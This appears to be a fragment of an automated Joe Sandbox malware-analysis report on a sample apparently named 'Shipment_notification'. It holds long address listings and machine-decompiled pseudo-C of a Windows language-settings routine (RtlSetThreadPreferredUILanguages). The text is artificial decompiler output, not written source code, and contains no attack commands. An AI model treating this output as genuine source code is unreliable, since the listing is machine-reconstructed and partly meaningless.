                                                                                0x01b126f9
                                                                                0x01b126fb
                                                                                0x01b126fe
                                                                                0x01b12700
                                                                                0x01b55b60
                                                                                0x00000000
                                                                                0x01b12706
                                                                                0x01b12706
                                                                                0x01b1270a
                                                                                0x01b1270a
                                                                                0x01b1270d
                                                                                0x01b12713
                                                                                0x01b12716
                                                                                0x01b12718
                                                                                0x01b1271c
                                                                                0x01b1271e
                                                                                0x01b55b6c
                                                                                0x01b55b6f
                                                                                0x01b55b7f
                                                                                0x01b55b89
                                                                                0x01b55b8e
                                                                                0x01b55b93
                                                                                0x01b55b96
                                                                                0x01b55b9c
                                                                                0x01b55ba0
                                                                                0x01b55ba3
                                                                                0x01b55bab
                                                                                0x01b55bb0
                                                                                0x01b55bb3
                                                                                0x01b55bb3
                                                                                0x01b55ba3
                                                                                0x01b12724
                                                                                0x01b12726
                                                                                0x01b12729
                                                                                0x01b1272c
                                                                                0x01b1279d
                                                                                0x01b1279d
                                                                                0x01b127a0
                                                                                0x01b127a2
                                                                                0x00000000
                                                                                0x01b1272e
                                                                                0x01b1272e
                                                                                0x01b12731
                                                                                0x01b12734
                                                                                0x01b12734
                                                                                0x01b12736
                                                                                0x01b55bc1
                                                                                0x01b55bc1
                                                                                0x01b55bc4
                                                                                0x00000000
                                                                                0x01b55bca
                                                                                0x01b55bca
                                                                                0x01b55bcd
                                                                                0x00000000
                                                                                0x01b55bd3
                                                                                0x00000000
                                                                                0x01b55bd3
                                                                                0x01b55bcd
                                                                                0x01b1273c
                                                                                0x01b1273c
                                                                                0x01b12742
                                                                                0x01b12747
                                                                                0x01b1274a
                                                                                0x01b1274d
                                                                                0x01b12750
                                                                                0x00000000
                                                                                0x01b12756
                                                                                0x01b12756
                                                                                0x00000000
                                                                                0x01b12902
                                                                                0x01b12908
                                                                                0x01b1290b
                                                                                0x00000000
                                                                                0x01b12911
                                                                                0x01b1291c
                                                                                0x01b12921
                                                                                0x00000000
                                                                                0x01b12921
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12880
                                                                                0x01b12887
                                                                                0x01b1288c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12805
                                                                                0x01b1280a
                                                                                0x01b12814
                                                                                0x01b12816
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1281e
                                                                                0x01b12821
                                                                                0x01b12823
                                                                                0x00000000
                                                                                0x01b12829
                                                                                0x01b12829
                                                                                0x01b12831
                                                                                0x01b1283c
                                                                                0x01b1283e
                                                                                0x00000000
                                                                                0x01b1283e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1284e
                                                                                0x01b12850
                                                                                0x01b12851
                                                                                0x01b12854
                                                                                0x01b12857
                                                                                0x01b1285a
                                                                                0x01b1285c
                                                                                0x01b1285d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b1275d
                                                                                0x01b12761
                                                                                0x00000000
                                                                                0x01b12767
                                                                                0x01b1276e
                                                                                0x01b12773
                                                                                0x01b12773
                                                                                0x01b12776
                                                                                0x01b12778
                                                                                0x01b1277e
                                                                                0x01b1277e
                                                                                0x01b12781
                                                                                0x01b12781
                                                                                0x01b12783
                                                                                0x01b12784
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55bd8
                                                                                0x01b55bde
                                                                                0x01b55be4
                                                                                0x01b55be6
                                                                                0x01b55be8
                                                                                0x01b55be9
                                                                                0x01b55bee
                                                                                0x01b55bf8
                                                                                0x01b55bff
                                                                                0x01b55c01
                                                                                0x01b55c04
                                                                                0x01b55c07
                                                                                0x01b55c0b
                                                                                0x01b55c0d
                                                                                0x01b55c0d
                                                                                0x01b55c15
                                                                                0x01b55c18
                                                                                0x01b55c1b
                                                                                0x01b55c1b
                                                                                0x01b55c1e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b128c3
                                                                                0x01b128c8
                                                                                0x01b128d2
                                                                                0x01b128d4
                                                                                0x01b128d8
                                                                                0x01b128db
                                                                                0x01b55c26
                                                                                0x01b55c28
                                                                                0x01b55c2d
                                                                                0x01b55c2d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55c34
                                                                                0x01b55c36
                                                                                0x01b55c49
                                                                                0x01b55c4e
                                                                                0x01b55c54
                                                                                0x01b55c5b
                                                                                0x01b55c5d
                                                                                0x01b55c60
                                                                                0x01b12788
                                                                                0x01b12788
                                                                                0x01b1278b
                                                                                0x01b1278e
                                                                                0x01b1278e
                                                                                0x01b1278e
                                                                                0x01b12791
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12756
                                                                                0x01b12750
                                                                                0x00000000
                                                                                0x01b12794
                                                                                0x01b12794
                                                                                0x01b12795
                                                                                0x01b12798
                                                                                0x01b12798
                                                                                0x00000000
                                                                                0x01b12734
                                                                                0x01b1272c
                                                                                0x01b12700
                                                                                0x01b125ef
                                                                                0x01b125ef
                                                                                0x01b125ef
                                                                                0x01b125f2
                                                                                0x01b125f8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b125fe
                                                                                0x00000000
                                                                                0x01b128e6
                                                                                0x01b128ec
                                                                                0x01b128ef
                                                                                0x01b128f5
                                                                                0x01b128f8
                                                                                0x01b128f8
                                                                                0x00000000
                                                                                0x01b128f8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12866
                                                                                0x01b12866
                                                                                0x01b12876
                                                                                0x01b12879
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b127e0
                                                                                0x01b127e7
                                                                                0x01b127e9
                                                                                0x01b127eb
                                                                                0x01b55afd
                                                                                0x00000000
                                                                                0x01b55afd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12633
                                                                                0x01b12638
                                                                                0x01b1263b
                                                                                0x01b1263c
                                                                                0x01b1263e
                                                                                0x01b12640
                                                                                0x01b12642
                                                                                0x01b12647
                                                                                0x01b12649
                                                                                0x01b1264e
                                                                                0x01b12650
                                                                                0x01b12653
                                                                                0x01b12659
                                                                                0x01b126a2
                                                                                0x01b126a7
                                                                                0x01b126ac
                                                                                0x01b126b2
                                                                                0x01b55b11
                                                                                0x01b55b15
                                                                                0x01b55b17
                                                                                0x00000000
                                                                                0x01b126b8
                                                                                0x01b126b8
                                                                                0x01b126ba
                                                                                0x01b127a6
                                                                                0x01b127a6
                                                                                0x01b127a9
                                                                                0x01b127ab
                                                                                0x01b127b9
                                                                                0x01b127b9
                                                                                0x01b127be
                                                                                0x01b127c1
                                                                                0x01b127c3
                                                                                0x01b127c5
                                                                                0x01b127c7
                                                                                0x01b55c74
                                                                                0x01b55c79
                                                                                0x01b55c79
                                                                                0x01b127c7
                                                                                0x00000000
                                                                                0x01b126c0
                                                                                0x01b126c0
                                                                                0x01b126c3
                                                                                0x01b126c6
                                                                                0x01b126c6
                                                                                0x01b126c9
                                                                                0x01b126c9
                                                                                0x00000000
                                                                                0x01b126c9
                                                                                0x01b126ba
                                                                                0x01b1265b
                                                                                0x01b1265b
                                                                                0x01b1265e
                                                                                0x01b12667
                                                                                0x01b1266d
                                                                                0x01b12677
                                                                                0x01b1267c
                                                                                0x01b1267f
                                                                                0x01b12681
                                                                                0x01b55b49
                                                                                0x01b55b4e
                                                                                0x01b127cd
                                                                                0x01b127d0
                                                                                0x01b127d1
                                                                                0x01b127d2
                                                                                0x01b127d4
                                                                                0x01b127dd
                                                                                0x01b12687
                                                                                0x01b12687
                                                                                0x01b1268a
                                                                                0x01b1268b
                                                                                0x01b1268e
                                                                                0x01b1268f
                                                                                0x01b12691
                                                                                0x01b12696
                                                                                0x01b12698
                                                                                0x01b1269d
                                                                                0x01b1269f
                                                                                0x00000000
                                                                                0x01b1269f
                                                                                0x01b12681
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12846
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12605
                                                                                0x01b1260a
                                                                                0x01b1260c
                                                                                0x01b12611
                                                                                0x01b12616
                                                                                0x01b12619
                                                                                0x01b12619
                                                                                0x01b1261e
                                                                                0x00000000
                                                                                0x01b12624
                                                                                0x01b12627
                                                                                0x01b12627
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55b1f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b12894
                                                                                0x01b1289b
                                                                                0x01b1289d
                                                                                0x01b128a1
                                                                                0x01b55b2b
                                                                                0x01b55b2e
                                                                                0x01b55b2e
                                                                                0x01b128a7
                                                                                0x01b128a9
                                                                                0x01b55b04
                                                                                0x01b55b09
                                                                                0x01b55b09
                                                                                0x01b55b09
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b55b35
                                                                                0x01b55b3c
                                                                                0x01b128fb
                                                                                0x01b128fb
                                                                                0x01b126cc
                                                                                0x01b126cc
                                                                                0x01b126d0
                                                                                0x00000000
                                                                                0x01b126d2
                                                                                0x01b126d2
                                                                                0x00000000
                                                                                0x01b126d2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b125fe
                                                                                0x01b1292d
                                                                                0x01b12930
                                                                                0x01b12935
                                                                                0x01b12939
                                                                                0x01b12940
                                                                                0x01b12945
                                                                                0x01b12946
                                                                                0x01b1294c
                                                                                0x01b1294e
                                                                                0x01b12951
                                                                                0x01b12951
                                                                                0x01b12952
                                                                                0x01b12958
                                                                                0x01b1295a
                                                                                0x01b12960
                                                                                0x01b12962
                                                                                0x01b12965
                                                                                0x01b12966
                                                                                0x01b1296c
                                                                                0x01b12971
                                                                                0x01b12974
                                                                                0x01b1297d
                                                                                0x01b1297e
                                                                                0x01b1297f
                                                                                0x01b12980
                                                                                0x01b12981
                                                                                0x01b12982
                                                                                0x01b12983
                                                                                0x01b12984
                                                                                0x01b12985
                                                                                0x01b12986
                                                                                0x01b12987
                                                                                0x01b12988
                                                                                0x01b12989
                                                                                0x01b1298a
                                                                                0x01b1298b
                                                                                0x01b1298c
                                                                                0x01b1298d
                                                                                0x01b1298e
                                                                                0x01b1298f
                                                                                0x01b12990
                                                                                0x01b12992
                                                                                0x01b12997
                                                                                0x01b129a3
                                                                                0x01b129a6
                                                                                0x01b129ab
                                                                                0x01b129ad
                                                                                0x01b129b0
                                                                                0x01b129b2
                                                                                0x01b55c80
                                                                                0x01b129b8
                                                                                0x01b129b8
                                                                                0x01b129bb
                                                                                0x01b129c0
                                                                                0x01b129c5
                                                                                0x01b129c6
                                                                                0x01b129c6
                                                                                0x01b129c9
                                                                                0x01b129cb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b129cd
                                                                                0x01b129d0
                                                                                0x01b129d9
                                                                                0x01b129db
                                                                                0x01b129dd
                                                                                0x01b12a7f
                                                                                0x01b12a84
                                                                                0x01b12a87
                                                                                0x01b12a89
                                                                                0x01b55ca1
                                                                                0x01b55ca3
                                                                                0x00000000
                                                                                0x01b12a8f
                                                                                0x01b12a8f
                                                                                0x00000000
                                                                                0x01b12a8f
                                                                                0x00000000
                                                                                0x01b129e3
                                                                                0x01b129e3
                                                                                0x01b129e3
                                                                                0x00000000
                                                                                0x01b129e3
                                                                                0x01b129dd
                                                                                0x00000000
                                                                                0x01b129db
                                                                                0x01b129e6
                                                                                0x01b129e9
                                                                                0x01b129eb
                                                                                0x01b129ed
                                                                                0x01b129f3
                                                                                0x01b129f5
                                                                                0x01b129f8
                                                                                0x01b129fa
                                                                                0x01b12a97
                                                                                0x01b12a9a
                                                                                0x01b12a9d
                                                                                0x01b12add
                                                                                0x00000000
                                                                                0x01b12a9f
                                                                                0x01b12aa2
                                                                                0x01b12aa5
                                                                                0x01b12aa8
                                                                                0x01b12aab
                                                                                0x01b55cab
                                                                                0x01b55caf
                                                                                0x01b55cc5
                                                                                0x01b55cda
                                                                                0x01b55cdc
                                                                                0x01b55cdf
                                                                                0x01b55ce5
                                                                                0x00000000
                                                                                0x01b55ceb
                                                                                0x01b55ced
                                                                                0x01b55cee
                                                                                0x00000000
                                                                                0x01b55cee
                                                                                0x01b55cb1
                                                                                0x01b55cb4
                                                                                0x01b55cb9
                                                                                0x01b55cbb
                                                                                0x00000000
                                                                                0x01b55cbd
                                                                                0x01b55cbd
                                                                                0x00000000
                                                                                0x01b55cbd
                                                                                0x01b55cbb
                                                                                0x01b12ab1
                                                                                0x01b12ab1
                                                                                0x01b12ac4
                                                                                0x01b12ac6
                                                                                0x01b12ac6
                                                                                0x00000000
                                                                                0x01b12ac6
                                                                                0x01b12aab
                                                                                0x00000000
                                                                                0x01b12a00
                                                                                0x01b12a09
                                                                                0x01b12a0e
                                                                                0x01b12a21
                                                                                0x01b12a24
                                                                                0x01b12a35
                                                                                0x01b12a3a
                                                                                0x01b12a3d
                                                                                0x01b12a42
                                                                                0x01b12a59
                                                                                0x01b12a59
                                                                                0x01b12a5c
                                                                                0x01b12a5f
                                                                                0x01b12a5f
                                                                                0x01b129fa
                                                                                0x01b129f3
                                                                                0x01b12a64
                                                                                0x01b12a64
                                                                                0x01b12a6b
                                                                                0x01b12a6b
                                                                                0x01b12a6d
                                                                                0x01b12a72
                                                                                0x01b12a72
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: PATH
                                                                                • API String ID: 0-1036084923
                                                                                • Opcode ID: d8d46e257f8e74ba697ab25f343e4f2972ad39699de640f1de31df08bc9bdd69
                                                                                • Instruction ID: 1e21e057dfabb90e82b8bc55dbd111622a9287b299c8d03536167835e967b55e
                                                                                • Opcode Fuzzy Hash: d8d46e257f8e74ba697ab25f343e4f2972ad39699de640f1de31df08bc9bdd69
                                                                                • Instruction Fuzzy Hash: B0C19171E00219DFDB2DDF99D880BAEBBB1FF48740F6541A9E901AB254E734A941CB60
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E01B1FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E01AFEEF0(0x1bd7b60);
					_t134 =  *0x1bd7b84; // 0x771a7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1bd7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1bd7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01AF6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E01AF76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01B88938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E01AEB150();
													}
													_t116 = E01B86D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E01AF75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1bd8638; // 0x0
																	_t122 = L01AF38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E01AF76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E01AF76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L01B1FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L01AF70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E01B1FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E01B1FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E01B1FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E01B1FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E01B1FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1bd7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1bd7b84 = _t75;
						_t73 = E01AFEB70(_t134, 0x1bd7b60);
						if( *0x1bd7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E01AFFF60( *0x1bd7b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                                                0x01b1fab0
                                                                                0x01b1fab2
                                                                                0x01b1fab3
                                                                                0x01b1fab4
                                                                                0x01b1fabc
                                                                                0x01b1fac0
                                                                                0x01b1fb14
                                                                                0x01b1fb17
                                                                                0x01b1fac2
                                                                                0x01b1fac8
                                                                                0x01b1facd
                                                                                0x01b1fad3
                                                                                0x01b1fad3
                                                                                0x01b1fadd
                                                                                0x01b1fb18
                                                                                0x01b1fb1b
                                                                                0x01b1fb1d
                                                                                0x01b1fb1e
                                                                                0x01b1fb1f
                                                                                0x01b1fb20
                                                                                0x01b1fb21
                                                                                0x01b1fb22
                                                                                0x01b1fb23
                                                                                0x01b1fb24
                                                                                0x01b1fb25
                                                                                0x01b1fb26
                                                                                0x01b1fb27
                                                                                0x01b1fb28
                                                                                0x01b1fb29
                                                                                0x01b1fb2a
                                                                                0x01b1fb2b
                                                                                0x01b1fb2c
                                                                                0x01b1fb2d
                                                                                0x01b1fb2e
                                                                                0x01b1fb2f
                                                                                0x01b1fb3a
                                                                                0x01b1fb3b
                                                                                0x01b1fb3e
                                                                                0x01b1fb41
                                                                                0x01b1fb44
                                                                                0x01b1fb47
                                                                                0x01b1fb4a
                                                                                0x01b1fb4d
                                                                                0x01b1fb53
                                                                                0x01b5bdcb
                                                                                0x01b5bdcb
                                                                                0x01b1fb59
                                                                                0x01b1fb5b
                                                                                0x01b1fb5b
                                                                                0x01b1fb5e
                                                                                0x01b5bdd5
                                                                                0x01b5bdd8
                                                                                0x00000000
                                                                                0x01b5bdda
                                                                                0x00000000
                                                                                0x01b5bdda
                                                                                0x01b1fb64
                                                                                0x01b1fb64
                                                                                0x01b1fb64
                                                                                0x01b1fb67
                                                                                0x01b1fb6e
                                                                                0x01b1fb70
                                                                                0x01b1fb72
                                                                                0x00000000
                                                                                0x01b1fb78
                                                                                0x01b1fb7a
                                                                                0x01b1fb7a
                                                                                0x01b1fb7d
                                                                                0x01b1fb80
                                                                                0x01b5bddf
                                                                                0x01b5bde1
                                                                                0x00000000
                                                                                0x01b5bde3
                                                                                0x00000000
                                                                                0x01b5bde3
                                                                                0x01b1fb86
                                                                                0x01b1fb86
                                                                                0x01b1fb86
                                                                                0x01b1fb8b
                                                                                0x01b1fb90
                                                                                0x01b1fb92
                                                                                0x01b1fb94
                                                                                0x01b1fb9a
                                                                                0x01b1fb9b
                                                                                0x01b1fba1
                                                                                0x01b5bde8
                                                                                0x01b5bdeb
                                                                                0x01b5bded
                                                                                0x01b5beb5
                                                                                0x01b5beb5
                                                                                0x01b5bebb
                                                                                0x01b5bebd
                                                                                0x01b5bec3
                                                                                0x01b5bed2
                                                                                0x01b5bedd
                                                                                0x01b5bedd
                                                                                0x01b5beed
                                                                                0x00000000
                                                                                0x01b5bdf3
                                                                                0x01b5bdfe
                                                                                0x01b5be06
                                                                                0x01b5be0b
                                                                                0x01b5be0d
                                                                                0x01b5be0f
                                                                                0x01b5be14
                                                                                0x01b5be19
                                                                                0x01b5be20
                                                                                0x01b5be25
                                                                                0x01b5be27
                                                                                0x01b5be35
                                                                                0x01b5be39
                                                                                0x01b5be46
                                                                                0x01b5be4f
                                                                                0x01b5be54
                                                                                0x01b5be56
                                                                                0x01b5bef8
                                                                                0x01b5bef8
                                                                                0x00000000
                                                                                0x01b5be5c
                                                                                0x01b5be5c
                                                                                0x01b5be60
                                                                                0x00000000
                                                                                0x01b5be66
                                                                                0x01b5be66
                                                                                0x01b5be7f
                                                                                0x01b5be84
                                                                                0x01b5be87
                                                                                0x01b5be89
                                                                                0x01b5be8b
                                                                                0x01b5be99
                                                                                0x01b5be9d
                                                                                0x01b5bea0
                                                                                0x01b5beac
                                                                                0x01b5beaf
                                                                                0x01b5beb1
                                                                                0x01b5beb3
                                                                                0x01b5beb3
                                                                                0x00000000
                                                                                0x01b5bea2
                                                                                0x01b5bea2
                                                                                0x00000000
                                                                                0x01b5bea2
                                                                                0x01b5be8d
                                                                                0x01b5be8d
                                                                                0x01b5be92
                                                                                0x00000000
                                                                                0x01b5be92
                                                                                0x01b5be8b
                                                                                0x01b5be60
                                                                                0x01b5be3b
                                                                                0x01b5be3b
                                                                                0x01b5be3e
                                                                                0x00000000
                                                                                0x01b5be40
                                                                                0x01b5be40
                                                                                0x01b5be44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01b5be44
                                                                                0x01b5be3e
                                                                                0x01b5be29
                                                                                0x01b5be29
                                                                                0x00000000
                                                                                0x01b5be29
                                                                                0x01b5be27
                                                                                0x00000000
                                                                                0x01b1fba7
                                                                                0x01b1fba7
                                                                                0x01b1fbab
                                                                                0x01b5bf02
                                                                                0x01b1fbb1
                                                                                0x01b1fbb1
                                                                                0x01b1fbb8
                                                                                0x01b1fbbd
                                                                                0x01b1fbbd
                                                                                0x01b1fbbf
                                                                                0x01b1fbbf
                                                                                0x01b1fbc5
                                                                                0x01b1fbcb
                                                                                0x01b1fbf8
                                                                                0x01b1fbf8
                                                                                0x01b1fbfa
                                                                                0x00000000
                                                                                0x01b1fc00
                                                                                0x01b1fc00
                                                                                0x01b1fc03
                                                                                0x00000000
                                                                                0x01b1fc09
                                                                                0x01b1fc09
                                                                                0x01b1fc0f
                                                                                0x01b1fc15
                                                                                0x01b1fc23
                                                                                0x01b1fc23
                                                                                0x01b1fc25
                                                                                0x01b1fc27
                                                                                0x01b1fc75
                                                                                0x01b1fc7c
                                                                                0x01b1fc84
                                                                                0x00000000
                                                                                0x01b1fc29
                                                                                0x01b1fc29
                                                                                0x01b1fc2d
                                                                                0x01b1fc30
                                                                                0x01b5bf0f
                                                                                0x00000000
                                                                                0x01b1fc36
                                                                                0x01b1fc38
                                                                                0x01b1fc3b
                                                                                0x01b1fc41
                                                                                0x01b5bf17
                                                                                0x01b5bf19
                                                                                0x01b5bf48
                                                                                0x01b5bf4b
                                                                                0x00000000
                                                                                0x01b5bf1b
                                                                                0x01b5bf22
                                                                                0x01b5bf24
                                                                                0x01b5bf26
                                                                                0x00000000
                                                                                0x01b5bf2c
                                                                                0x01b5bf37
                                                                                0x01b5bf39
                                                                                0x01b5bf3b
                                                                                0x00000000
                                                                                0x01b5bf41
                                                                                0x01b5bf41
                                                                                0x01b5bf41
                                                                                0x01b5bf41
                                                                                0x01b5bf45
